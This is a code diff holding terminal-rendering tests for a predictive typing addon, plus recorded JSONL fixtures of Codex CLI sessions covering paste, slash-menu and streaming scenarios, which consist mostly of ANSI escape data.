it('streaming-real: mid-stream typing survives real baseY growth (recorded with real auth)', async () => {
|
||||
// The one shape the fake-key lab cannot produce: a genuine model reply
|
||||
// streaming above the pinned composer pushes lines into history, so
|
||||
// baseY GROWS while predictions are outstanding: the no-drop-on-baseY
|
||||
// rule against reality instead of a synthetic scroll.
|
||||
const { rt, addon, events } = await replay('streaming-real');
|
||||
expect(rt.term.buffer.active.baseY).toBeGreaterThan(0); // history really grew
|
||||
const midStream = events.filter((e) => e.kind === 'char' && ['a', 'b', 'c'].includes(e.key));
|
||||
expect(midStream.length).toBe(3);
|
||||
expect(midStream.some((e) => e.painted)).toBe(true); // predictions ran mid-stream
|
||||
await converge(rt, addon);
|
||||
expect(rt.cursorRowText()).toBe('› abc'); // the mid-stream chars landed intact
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}, 15000);
|
||||
|
||||
it('paste-bracketed: typed chars confirm, the paste clears predictions, content intact', async () => {
|
||||
const { rt, addon, events } = await replay('paste-bracketed');
|
||||
const paste = events.find((e) => e.key.startsWith('\x1b[200~'))!;
|
||||
expect(paste.kind).toBe('clear');
|
||||
expect(paste.spansAfter).toBe(0);
|
||||
await converge(rt, addon);
|
||||
expect(addon.state.confirmedTotal).toBe(2); // 'a', 'b'
|
||||
expect(rt.cursorRowText()).toContain('abXYZpasted');
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}, 15000);
|
||||
|
||||
it('trust-modal: the predictWhen gate paints ZERO spans on the modal (ghost eliminator)', async () => {
|
||||
const { rt, addon, events } = await replay('trust-modal');
|
||||
const x = events.find((e) => e.key === 'x')!;
|
||||
expect(x.painted).toBe(false);
|
||||
expect(x.spansAfter).toBe(0);
|
||||
expect(events.every((e) => e.spansAfter === 0)).toBe(true);
|
||||
await converge(rt, addon);
|
||||
expect(addon.state.confirmedTotal).toBe(0);
|
||||
expect(addon.state.droppedTotal).toBe(0);
|
||||
// The transition landed on the real composer afterwards
|
||||
expect(rt.cursorRowText()).toMatch(/^› /);
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}, 15000);
|
||||
});
|
||||
@@ -0,0 +1,28 @@
|
||||
{"scenario":"paste-bracketed","cols":100,"rows":30,"codexVersion":"codex-cli 0.147.0","recordedAt":"2026-08-09T01:51:11.762Z"}
|
||||
{"delayMs":0,"data":"\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?2004h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[c\u001b[>c\u001b[>q\u001b]10;?\u001b\\\u001b]11;?\u001b\\\u001b[1;1H\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":0,"data":"\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":45,"data":"\u001b[32m\u001b[1markon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-bWhHjh\u001b(B\u001b[m$ "}
|
||||
{"delayMs":638,"data":"exec codex\r\n"}
|
||||
{"delayMs":420,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":182,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":5,"data":"\r\n\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[2;30r\u001b[2;1H\u001bM\u001bM\u001bM\u001b[33m⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\r\n\u001b[39m \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[1;30r\u001b[4;1H\u001b(B\u001b[m"}
|
||||
{"delayMs":1,"data":" \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[6;1H\u001b[39m\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b[3mloading\u001b(B\u001b[m\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-bWhHjh\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[14;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mSummarize rec\u001b(B\u001b[m\u001b[2ment commits\u001b[16;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-bWhHjh\u001b[14;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":7,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;27H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":21,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;27H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":8,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;27H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":159,"data":"\u001b[6;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mSummarize recent commits\u001b[9;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-bWhHjh\u001b[7;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":21,"data":"\u001b[5;30r\u001b[5;1H\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\r\n\u001b[2m╭─────────────────────────────────────────────────╮\u001b[1;30r\u001b[7;1H\u001b(B\u001b[m\u001b[2m│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-bWhHjh\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[13;1H\u001b(B\u001b[m \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\r\n"}
|
||||
{"delayMs":0,"data":" reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[18;27H\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[24C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[24C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":3487,"data":"\u001b[?7727h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[32m\u001b[1m\u001b[Harkon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-bWhHjh\u001b(B\u001b[m$ exec codex\u001b[K\u001b[33m\r\n⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\u001b[39m\u001b[K\r\n \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[39m\u001b[K\r\n \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[39m\u001b[K\r\n\u001b[K\u001b[2m\r\n╭─────────────────────────────────────────────────╮\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-bWhHjh\u001b[2m │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n╰─────────────────────────────────────────────────╯\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\u001b[K\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\u001b[K\r\n reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[1m\r\n›\u001b(B\u001b[m\u001b[1X\u001b[2m\u001b[CSummarize recent commits\u001b(B\u001b[m\u001b[K\r\n\u001b[K\u001b[20;2H\u001b[1K\u001b[38;5;223m\u001b[Cgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-bWhHjh\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[18;3H"}
|
||||
{"keyAt":true,"data":"a"}
|
||||
{"delayMs":207,"data":"a\u001b[K\u001b[20;80H\u001b[K\u001b[18;4H"}
|
||||
{"keyAt":true,"data":"b"}
|
||||
{"delayMs":91,"data":"b\u001b[K\u001b[20;80H\u001b[K\u001b[18;5H"}
|
||||
{"keyAt":true,"data":"\u001b[200~XYZpasted\u001b[201~"}
|
||||
{"delayMs":383,"data":"XYZpasted\u001b[K\u001b[20;80H\u001b[K\u001b[18;14H"}
|
||||
@@ -0,0 +1,32 @@
|
||||
{"scenario":"slash-picker","cols":100,"rows":30,"codexVersion":"codex-cli 0.147.0","recordedAt":"2026-08-09T01:50:42.069Z"}
|
||||
{"delayMs":0,"data":"\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?2004h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[c\u001b[>c\u001b[>q\u001b]10;?\u001b\\\u001b]11;?\u001b\\\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":0,"data":"\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":37,"data":"\u001b[32m\u001b[1markon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-bw9Uto\u001b(B\u001b[m$ "}
|
||||
{"delayMs":647,"data":"exec codex\r\n"}
|
||||
{"delayMs":437,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":183,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":8,"data":"\r\n\u001b[J\u001b[A\u001b[K\u001b[2;30r\u001b[2;1H\u001bM\u001bM\u001bM\u001b[33m⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\r\n\u001b[39m \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\r\n\u001b[39m \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[6;1H\u001b[39m\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b[3mloading\u001b(B\u001b[m\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-bw9Uto\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[14;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[16;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-bw9Uto\u001b[1;30r\u001b[14;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":9,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;39H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":12,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;39H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":10,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;39H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":157,"data":"\u001b[6;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[9;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-bw9Uto\u001b[7;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":20,"data":"\u001b[5;30r\u001b[5;1H\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\r\n\u001b[2m╭─────────────────────────────────────────────────╮\u001b[1;30r\u001b[7;1H\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[2m│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-bw9Uto\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[13;1H\u001b(B\u001b[m \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\r\n"}
|
||||
{"delayMs":0,"data":" reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[18;39H\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[36C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[36C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":3476,"data":"\u001b[?7727h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[32m\u001b[1m\u001b[Harkon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-bw9Uto\u001b(B\u001b[m$ exec codex\u001b[K\u001b[33m\r\n⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\u001b[39m\u001b[K\r\n \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[39m\u001b[K\r\n \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[39m\u001b[K\r\n\u001b[K\u001b[2m\r\n╭─────────────────────────────────────────────────╮\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-bw9Uto\u001b[2m │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n╰─────────────────────────────────────────────────╯\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\u001b[K\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\u001b[K\r\n reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[1m\r\n›\u001b(B\u001b[m\u001b[1X\u001b[2m\u001b[CUse /skills to list available skills\u001b(B\u001b[m\u001b[K\r\n\u001b[K\u001b[20;2H\u001b[1K\u001b[38;5;223m\u001b[Cgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-bw9Uto\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[18;3H"}
|
||||
{"keyAt":true,"data":"/"}
|
||||
{"delayMs":207,"data":"\u001b[17;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":1,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m/\u001b[20;3H\u001b[36m\u001b[1m/model choose what model and reasoning effort to use\u001b[21;3H\u001b(B\u001b[m/fast\u001b[10C\u001b[2m1.5x speed, increased usage\u001b[22;3H\u001b(B\u001b[m/ide\u001b[11C\u001b[2minclude current selection, open files, and other context from your IDE\u001b[23;3H\u001b(B\u001b[m/permissions\u001b[3C\u001b[2mchoose what Codex is allowed to do\u001b[24;3H\u001b(B\u001b[m/keymap\u001b[8C\u001b[2mremap TUI shortcuts\u001b[25;3H\u001b(B\u001b[m/vim\u001b[11C\u001b[2mtoggle Vim mode for the composer\u001b[26;3H\u001b(B\u001b[m/experimental\u001b[2C\u001b[2mtoggle experimental features\u001b[27;3H\u001b(B\u001b[m/approve\u001b[7C\u001b[2mapprove one retry of a recent auto-review denial\u001b[18;4H\u001b(B\u001b[m"}
|
||||
{"keyAt":true,"data":"m"}
|
||||
{"delayMs":398,"data":"\u001b[17;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":1,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m/m\u001b[20;3H\u001b[36m\u001b[1m/model choose what model and reasoning effort to use\u001b[21;3H\u001b(B\u001b[m/\u001b[1mm\u001b(B\u001b[memories\u001b[2C\u001b[2mconfigure memory use and generation\u001b[22;3H\u001b(B\u001b[m/\u001b[1mm\u001b(B\u001b[mention\u001b[3C\u001b[2mmention a file\u001b[23;3H\u001b(B\u001b[m/\u001b[1mm\u001b(B\u001b[mcp\u001b[7C\u001b[2mlist configured MCP tools; use /mcp verbose for details\u001b[18;5H\u001b(B\u001b[m"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":148,"data":"\u001b[17;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m/mo\u001b[20;3H\u001b[36m\u001b[1m/model choose what model and reasoning effort to use\u001b[18;6H\u001b(B\u001b[m"}
|
||||
{"keyAt":true,"data":"\u001b"}
|
||||
@@ -0,0 +1,233 @@
|
||||
{"scenario":"streaming-burst","cols":100,"rows":30,"codexVersion":"codex-cli 0.147.0","recordedAt":"2026-08-09T01:51:03.828Z"}
|
||||
{"delayMs":0,"data":"\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?2004h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[c\u001b[>c\u001b[>q\u001b]10;?\u001b\\\u001b]11;?\u001b\\\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":0,"data":"\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":39,"data":"\u001b[32m\u001b[1markon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-ruT16A\u001b(B\u001b[m$ "}
|
||||
{"delayMs":635,"data":"exec codex\r\n"}
|
||||
{"delayMs":439,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":184,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":9,"data":"\r\n\u001b[J\u001b[A\u001b[K\u001b[2;30r\u001b[2;1H\u001bM\u001bM\u001bM\u001b[1;30r\u001b[2;1H\u001b[33m⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\r\n\u001b[39m \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\r\n\u001b(B\u001b[m \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[6;1H\u001b[39m\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b[3mloading\u001b(B\u001b[m\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-ruT16A\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[14;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[16;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-ruT16A\u001b[14;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":8,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;39H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":8,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;39H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":8,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;39H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":158,"data":"\u001b[6;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[9;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-ruT16A\u001b[7;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":21,"data":"\u001b[5;30r\u001b[5;1H\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\r\n\u001b[2m╭─────────────────────────────────────────────────╮\u001b[1;30r\u001b[7;1H\u001b(B\u001b[m\u001b[2m│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-ruT16A\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[13;1H\u001b(B\u001b[m \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\r\n"}
|
||||
{"delayMs":0,"data":" reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[18;39H\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[36C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":3486,"data":"\u001b[?7727h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[18;3H"}
|
||||
